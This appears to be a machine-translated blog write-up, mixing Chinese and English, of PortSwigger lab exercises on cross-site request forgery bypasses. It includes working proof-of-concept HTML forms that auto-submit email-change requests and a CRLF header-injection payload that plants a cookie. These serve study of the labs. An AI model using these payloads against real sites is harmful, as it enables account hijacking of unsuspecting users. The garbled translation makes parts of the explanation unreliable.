当前位置:网站首页>CSRF (Cross Site Request Forgery)
CSRF (Cross Site Request Forgery)
2022-08-02 04:02:00 【CHIAJ176】
根据PortSwiggerThe content of the experiment will beCSRFRecord the type of vulnerability
- 相关操作.There are actions in the application that an attacker could reasonably induce.这可能是特权操作(如修改其他用户的权限)或对用户特定数据的任何操作(如更改用户自己的密码).
- 基于 Cookie 的会话处理.执行该操作涉及发出一个或多个 HTTP 请求,And the application only depends on the session Cookie 来标识发出请求的用户.没有其他机制可用于跟踪会话或验证用户请求.
- No unpredictable request parameters.The request to perform the action does not contain any parameters whose value an attacker cannot determine or guess.例如,When the user is caused to change their password,如果攻击者需要知道现有密码的值,则该功能不会受到攻击.
- CSRF token
- SameSite cookie设置
没有防御措施的 CSRF 漏洞
顾名思义,没有任何防御CSRF的措施.Sessions are just thatcookie或session来维持,It must have existed for so longCSRF漏洞.
<form method="$method" action="$url">
<input type="hidden" name="$param1name" value="$param1value">
CSRFValidation of the token depends on the request method
可以看到除了Cookie用来进行身份认证,There is also a tokentoken csrf 用来进行身份认证.
The problem here is the use of dataPOSTmethod when submitting,令牌csrf会进行认证.But how to change the request method(POST改为GET),令牌csrfwill not be certified.因此存在CSRF漏洞.
Token validation relies on the existence of the token CSRF
与上面CSRFValidation of the token depends on the request method类似,存在token,But this question is not about changing the request method.The vulnerability is due to the token being properly validated when it exists,But if token is omitted then validation is skipped.在这种情况下,An attacker can remove the entire parameter containing the token(Not just its value)to bypass verification and initiate CSRF 攻击.
The token is not bound to the user's session CSRF
The packets are similar to above.某些应用程序不会验证令牌是否与发出请求的用户属于同一会话.相反,An application maintains a global pool of tokens it has issued,and accepts any token presented in this pool.
在此情况下,攻击者可以使用自己的帐户登录到应用程序,Get a valid token,然后在其 CSRF This token is provided to the victim user in the attack.
<form method="POST" action="https://ac2f1fe71f3b1e8cc00625ba00f900fc.web-security-academy.net/my-account/change-email">
<input type="hidden" name="email" value="[email protected]">
<input type="hidden" name="csrf" value="8XVl6nxXiMUEC2ZYJ8djwL39mPPcvzyy">
令牌绑定到非会话 Cookie 的 CSRF
Certain applications do CSRF 令牌绑定到 Cookie,But not bound to the same one used to track the session Cookie.更改session cookie会使您注销,但更改csrfKey cookie 只会导致CSRF 令牌被拒绝.这表明csrfKey cookie 可能没有严格绑定到会话.
当应用程序使用两个不同的框架时,很容易发生这种情况,一个用于会话处理,另一个用于CSRF保护,They are not integrated.
This situation is more difficult to exploit,But still vulnerable.If the site contains anything that allows the attacker to be on the victim浏览器中设置 cookie 的行为,may be attacked.攻击者可以使用自己的帐户登录到应用程序,Get a valid token and associatedcookie,利用cookie设置行为将其cookie放入受害者的浏览器中,并在CSRFThe attack provides its token to the victim.
<!-- CSRF PoC - generated by Burp Suite Professional -->
<script>history.pushState('', '', '/')</script>
<form action="https://acc21f311f942a71c072031e00990034.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="[email protected]" />
<input type="hidden" name="csrf" value="lmjIpDMzZjMT1DytwERXkQu1CVHdk0H1" />
<input type="submit" value="Submit request" />
<img src="https://acc21f311f942a71c072031e00990034.web-security-academy.net/?search=heason%0d%0aSet-Cookie:%20csrfKey=B2AjipewNVuxVWu2XLzHNo9cxG5fVw3V" onerror=document.forms[0].submit();>
在 Cookie 中复制令牌的 CSRF(双重提交防御)
POST /email/change HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 68
Cookie: session=1DQGdzYbOJQzLP7460tfyiv3do7MjyPw; csrf=R8ov2YBfTYmzFyjit8o2hKBuoIjXXVpa
csrf=R8ov2YBfTYmzFyjit8o2hKBuoIjXXVpa&[email protected]
在此情况下,如果网站包含任何 cookie 设置功能,攻击者可以再次执行 CSRF 攻击.在这里,攻击者There is no need to obtain your own valid token.They just invented a token(If checking,may be the desired format),利用cookie设置行为将他们的cookie放入受害者的浏览器中,并在他们的CSRF攻击中将他们的令牌提供给受害者.
Referrer validation relies on the presence of the header(referrer)
除了使用CSRF令牌的防御之外,一些应用程序还利用HTTP标头来尝试防御CSRF攻击,通常是通过验证请求是否来自应用程序自己的域.完全删除referrerAuthentication will be skipped.
<script>history.pushState('', '', '/')</script>
<form action="https://ac4b1f4e1fa1b272c07211b9003e00c7.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="[email protected]" />
<input type="submit" value="Submit request" />
<meta name="referrer" content="never">
<meta name="referrer" content="never">
Reference program verification was interrupted CSRF
与Referrer validation relies on the presence of the headercompared to the experiments,删除referrerThe header cannot serve the purpose of skipping authentication.
Some applications validate headers in a naive way that can be bypassed.例如,如果应用程序验证 Whether the domain in starts with the expected value,then an attacker can make it a subdomain of his own domain:Referer
同样,如果应用程序只是验证 是否包含自己的域名,The attacker can then put the desired value in URL 中的其他位置:Referer
Although you might be able to use Burp recognize this behavior,But when you test the proof of concept in the browser,You will often find that this method no longer works.To reduce the risk of exposing sensitive data in this way,Many browsers now strip query strings from headers by default.
You can override this behavior by ensuring that the response containing your exploit has the header set(请注意,The spelling is correct in this case,Just to make sure you pay attention!This ensures that the complete is sent URL,包括查询字符串.
Referrer-Policy: unsafe-url
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Referrer-Policy: unsafe-url
<!-- CSRF PoC - generated by Burp Suite Professional -->
<script>history.pushState('', '', '/?aceb1fe31e57ca0bc05a89f500e30013.web-security-academy.net')</script>
<form action="https://aceb1fe31e57ca0bc05a89f500e30013.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="[email protected]" />
<input type="submit" value="Submit request" />
- 文件包含漏洞
- Xiaoyao multi-open emulator ADB driver connection
- Phonebook
- DVWA drone installation tutorial
- Phpstudy安装Thinkphp6(问题+解决)
- (5) 模块与包、编码格式、文件操作、目录操作
- The roll call system and array elements find maximum and minimum values for sorting of objects
- Shuriken: 1 vulnhub walkthrough
- PHP realizes the automatic reverse search prompt of the search box
- JS objects, functions and scopes
动力:2 vulnhub预排
(5) 模块与包、编码格式、文件操作、目录操作
13. JS output content and syntax
web渗透必玩的靶场——DVWA靶场 1(centos8.2+phpstudy安装环境)
IO stream, encoding table, character stream, character buffer stream
Shuriken: 1 vulnhub walkthrough
Smart Tips for Frida Scripting in Kali Environment
(2) Sequence structures, Boolean values of objects, selection structures, loop structures, lists, dictionaries, tuples, sets
1. Beginning with PHP
hackmyvm: controller walkthrough
(7) 浅学 “爬虫” 过程 (概念+练习)
4. The form with the input
hackmyvm-random walkthrough
Summary of php function vulnerabilities
SQL: DDL, DML, DQL, DCL corresponding introduction and demonstration
攻防世界—MISC 新手区1-12
web渗透必玩的靶场——DVWA靶场 1(centos8.2+phpstudy安装环境)
Various ways of AES encryption
3. PHP data types, constants, strings and operators
QR code generation API interface, which can be directly connected as an A tag
动力:2 vulnhub预排
(4) 函数、Bug、类与对象、封装、继承、多态、拷贝